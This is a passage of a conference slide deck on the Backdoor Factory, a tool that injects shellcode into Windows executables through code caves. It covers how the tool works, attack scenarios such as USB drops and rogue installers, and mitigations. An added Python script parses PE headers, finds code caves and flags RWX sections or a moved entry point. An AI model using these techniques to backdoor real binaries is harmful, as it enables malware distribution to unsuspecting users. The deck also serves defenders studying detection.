  • 43. Solution: BDF • x32 version released in March 2013 – Supported only single cave jumping – No x32 stager support • Python27 - Single Script • Supports win32/64 – Supports x32 stagers – No stager payloads for x64 yet. (Remember that bug feature request?) • Code Cave injection (single and multiple) • Support user-provided shellcode • Some Randomization (different hash every time an EXE is created) – Through random one’s complement in the code – And different types of nops • Injector Module
  • 44. How BDF works • Enumerates PE/COFF Header format • Determines if binary is supported (win32/64 intel) • Locates code caves that correspond to size of shellcode • Patches executable in an attempt to return registers/flags to the original state for continued execution – Patches entry location with a JMP to the first selected code cave/appended section – Patches each user selected code cave
  • 45. How BDF works • Very primitive disassembler to do just what we need • Reworked the x32 msfvenom stager ‘keep’ stub to work in code caves and with user provided shellcode – x64 stager support is in the works • Reworked a handful of useful metasploit payloads to allow for multiple code cave jumping
  • 48. Now You Can Do This
  • 50. Demos • Support Check (Live) • Backdooring win32/64 binaries (Live) – Append code cave – Single code caving – Code Cave jumping • Mass backdooring (directory) - Live • Provide your own shellcode - Live • Prototyping shellcode (video) • The injector module (video)
  • 51. DEMO – Support Check • If not supported, then what? • Email me with the disassembly of the entry function (from a legitimate email) • I’ll send you the opcode update
  • 52. DEMO - Patch a file with shellcode win32/64 • Append • Pick a single Cave • Multi-Jumps • Note – Non-stager payloads will ‘hang’ if C2 is not available – Payloads are patched ‘in-line’ and not run in a separate thread
  • 53. DEMO - Mass backdooring (directory)
  • 54. DEMO - Prototyping shellcode
  • 55. DEMO – Injector Module • Injector is the hunt and backdoor binary of doom. • Use responsibly
  • 56. DEMO - Provide your own shellcode • Can be anything, just make sure it matches the process type (x32 for x32) • Make sure you use ExitFunction=Thread or you will kill the parent process (not good)
  • 57. Attack Scenarios or Methods • Salting Parking Lots with USBs • Hosting Rogue Exes • Attacking system services • Linux Setuid Attack for Windows – Patching binaries that require elevated perms but might be in non-admin directories • Sysinternal tools • Setup files
  • 58. Mitigations • UPX encoding • Self Validation • AVs • EMET 4.0+ • Hash verification • White Listing
  • 59. Mitigations - UPX Encoding • Not supported by BDF • Unpack – Patch – Pack • UPX is not protection against patching • Could open up your EXE to potential weaknesses – Are you unpacking to unprotected memory space?
  • 60. Mitigations - Self Validation • Team Viewer • Round Robin Checking • Find the check, patch it
  • 61. Mitigations – Anti-Virus • I broke the “rule” and uploaded my samples to VirusTotal for this presentation • It really doesn’t matter • AV is dead
  • 62. MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping MSFVENOM -k -t exe Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
  • 63. MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping MSFVENOM -t exe Hash: 6d0cb53a4fa983287310260f5c8659ab6c3a761ef8dbd147cf2cfd9e971f4295
  • 64. MSFVENOM keep vs MSFVENOM non-keep vs BDF Cave Jumping BDF Cave jumping Hash: 5620ba8c64ff0d9cde65eda4156fbb85186f2bd0f16636cded5c9a0d8024d4e9
  • 65. win32 BDF vs win64 BDF ZoomIt.exe vs ZoomIt64.exe
  • 66. EMET 4.0+ FTW? • If you use position-independent shellcode (metasploit) • And the target binary is protected by EMET… • And the Caller protection setting is enabled… • And the application is running as win32… • EMET will stop this type of attack!
  • 67. EMET 4.0+ FTW? • If the binary executes as a win64 process • EMET will not stop this type of attack! From the EMET 4.0 User Guide:
  • 68. Mitigations - Whitelisting • Based on what you’ve seen today, why would you trust AV? • There are whitelisting vendors, I’m not endorsing any of them • I did not test it, but they “should” work – if based on hash verification and not name • Not the end game solution (e.g. powershell memory injection)
  • 69. Enterprise Mitigations • Don’t let end users download binaries • Verify Your Binaries before Deploying – Verify hashes – Conduct forensic analysis and testing – Look at network traffic – Etc…
  • 70. Road Map • x64 stub to support staged payloads • Support Mach-O and ELF formats • Patch the IAT and API pointers to shorten required shellcode and eliminate ROP-like calls • MITM patching of binaries during download
  • 71. Progress on x64 Stager
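An added example, not code from the talk or from the Backdoor Factory: a small PE32/PE32+ header walker (slides 24-25) that finds null-byte code caves of a given minimum size in named sections (slides 31-38) and runs the defender-side checks the mitigation slides point at: a section that is both writable and executable like the unnamed RWE section of slide 19, and an entry point that no longer lands in a read/execute code section (slide 44). The sample image is built inline, so the section name `.moo`, the offsets and the cave sizes are assumptions, not values from the talk.

```python
import re
import struct

# IMAGE_SECTION_HEADER characteristics from the PE/COFF spec
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
SECTION_FMT = "<8sIIIIIIHHI"  # 40-byte IMAGE_SECTION_HEADER

def parse_pe(data):
    """DOS hdr -> PE sig -> COFF hdr -> optional hdr -> section table; returns (machine, entry_rva, sections)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe = struct.unpack_from("<I", data, 0x3C)[0]                       # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsect, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, pe + 4)
    opt = pe + 24                                                      # optional header start
    if struct.unpack_from("<H", data, opt)[0] not in (0x10B, 0x20B):  # PE32 / PE32+
        raise ValueError("unknown optional header magic")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]            # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        name, vsize, va, rsize, rptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_FMT, data, opt + opt_size + 40 * i)
        sections.append(dict(name=name.rstrip(b"\0").decode("ascii", "replace"),
                             va=va, vsize=vsize, raw_ptr=rptr, raw_size=rsize, chars=chars))
    return machine, entry_rva, sections

def find_code_caves(data, min_len=200):
    """Slide 31's caves: runs of 0x00 in a section's raw data; returns (section, file offset, length)."""
    caves = []
    for s in parse_pe(data)[2]:
        raw = data[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]]
        for m in re.finditer(rb"\x00{%d,}" % min_len, raw):
            caves.append((s["name"], s["raw_ptr"] + m.start(), m.end() - m.start()))
    return caves

def audit_sections(data):
    """Defender checks: writable+executable sections (slide 19's suspicious RWE section) and an
    entry point that is not inside a read/execute code section (slide 44). Returns findings."""
    _, entry_rva, sections = parse_pe(data)
    findings, entry_sec = [], None
    for s in sections:
        if s["chars"] & IMAGE_SCN_MEM_EXECUTE and s["chars"] & IMAGE_SCN_MEM_WRITE:
            findings.append("section %s is writable and executable (RWX)" % s["name"])
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw_size"]):
            entry_sec = s
    if entry_sec is None:
        findings.append("entry point %#x is outside every section" % entry_rva)
    elif not entry_sec["chars"] & IMAGE_SCN_MEM_EXECUTE:
        findings.append("entry point %#x is in non-executable section %s" % (entry_rva, entry_sec["name"]))
    elif entry_sec["chars"] & IMAGE_SCN_MEM_WRITE:
        findings.append("entry point %#x is in writable section %s" % (entry_rva, entry_sec["name"]))
    return findings

def build_sample_pe(entry_rva, appended=True):
    """Constructed minimal PE32 image (assumption: hand-built, not compiler output). .text holds a
    48-byte and a 64-byte cave, .data a 510-byte one; optional '.moo' plays an appended RWX section."""
    text = b"\x90" * 0x40 + b"\x00" * 0x30 + b"\x90" * 0x150 + b"\x00" * 0x40
    code = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ
    secs = [(b".text", 0x1000, 0x200, 0x200, code, text),
            (b".data", 0x2000, 0x200, 0x400, IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ
             | IMAGE_SCN_MEM_WRITE, b"\x01\x02" + b"\x00" * 0x1FE)]
    if appended:
        secs.append((b".moo", 0x3000, 0x100, 0x600, code | IMAGE_SCN_MEM_WRITE, b"\xCC" * 0x100))
    opt = struct.pack("<H", 0x10B) + b"\0" * 14 + struct.pack("<I", entry_rva) + b"\0" * 76
    img = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                    # e_lfanew = 64
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(secs), 0, 0, 0, len(opt), 0x102) + opt
    for name, va, size, ptr, chars, _ in secs:
        img += struct.pack(SECTION_FMT, name, size, va, size, ptr, 0, 0, 0, 0, chars)
    img = img.ljust(0x200, b"\0")                                       # headers end at 0x200
    for _, _, _, ptr, _, body in secs:
        assert len(img) == ptr                                          # sections laid out back to back
        img += body
    return img

if __name__ == "__main__":
    sample = build_sample_pe(0x3000)   # entry re-pointed into the appended RWX section
    print(find_code_caves(sample, 48))
    print(audit_sections(sample))
```

With the default `min_len=200` only the .data cave remains, which matches the talk's observation that real caves over 200 bytes are few and live in named sections; on a real file, read it with `open(path, "rb").read()` and pass the bytes in.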

Editor's Notes

  1. Changes: Entry location and the code at entry.
  2. First stub: allocates memory, copies the 2nd shellcode into memory, creates and launches it in a separate thread.
  3. From Hopper disassembler for Mac. The outer blue lines show jumps to greater memory addresses; the red lines show jumps to lesser memory addresses.
  4. On Mac test on win7
  5. On Mac
  6. On mac, test on win7
  7. On win 8.1 with MSSE binary
  8. On Mac
  9. X64 shellcode is the way to go.